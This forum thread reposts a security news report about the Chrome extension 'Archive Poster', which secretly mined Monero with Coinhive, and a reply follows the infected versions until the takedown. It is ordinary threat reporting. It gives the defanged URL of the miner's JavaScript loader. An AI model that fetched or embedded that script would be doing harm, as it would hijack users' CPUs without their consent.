Chrome Extension with 100,000 Users Caught Pushing Cryptocurrency Miner

LASER_oneXM

Level 37
Thread author
Verified
Top Poster
Well-known
Feb 4, 2016
2,520
Chrome-Extension-Archive-Poster.png


A Chrome extension with over 105,000 users has been deploying an in-browser cryptocurrency miner to unsuspecting users for the past few weeks.

The extension does not ask for user permission before hijacking their CPUs to mine Monero all the time the Chrome browser is open.

Named "Archive Poster," the extension is advertised as a mod for Tumblr that allows users an easier way to "reblog, queue, draft, and like posts right from another blog's archive."

According to users reviews, around the start of December the extension has incorporated the infamous Coinhive in-browser miner in its source code.

Chrome-Extension-Archive-Poster-Reviews.png


Troy Mursch, a US-based security researcher who's been keeping a close eye on the cryptojacking scene, alerted Bleeping Computer of this threat today.

According to Mursch, the Coinhive cryptojacking code is hidden in a JavaScript file loaded from the following URL:

https://c7e935.netlify[.]com/b.js

Another case of a hijacked extensions? or is it intentional?

Over the spring and summer, Chrome extension developers have been under a barrage of phishing attacks. Miscreants were trying to take over extensions, adding adware code and pushing a tainted update to the extension's userbase when successful.


Some of these phishing attacks were successful, and several cases were reported when high-profile extensions with large userbases were hijacked to push adware [1, 2, 3].


The company behind Archive Poster does not have a contact method listed on its website, so Bleeping Computer wasn't able to confirm this was intentional or another case of a hijacked extension.
 

Tsiehshi

Level 2
Verified
Nov 11, 2017
51
The Archive Poster extension has been shipping the hidden Coinhive cryptojacker for at least four versions —from 4.4.3.994 to 4.4.3.998.

It actually seems to date back at least to the 4.4.3.93 version (Dec 8th according to the last modification date of verified_contents.json).

PS. A Chrome Webstore reviewer said he used to love it until it was updated on 12/7/2017. That's not a contradiction as the extension archive isn't updated every day (probably wasn't updated on the 7th).

PPS. At 9:34 PM, it got updated to 4.4.4.0 (damn the hackers are fast). And they'll approve it again and again. :censored:

+ 11:30 PM: 4.4.4.01. Once 2 hours or what?

PPPS. Here's a more detailed version history, which means it started with 4.4.3.91.

PPPPS. Finally taken down. Good riddance.
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top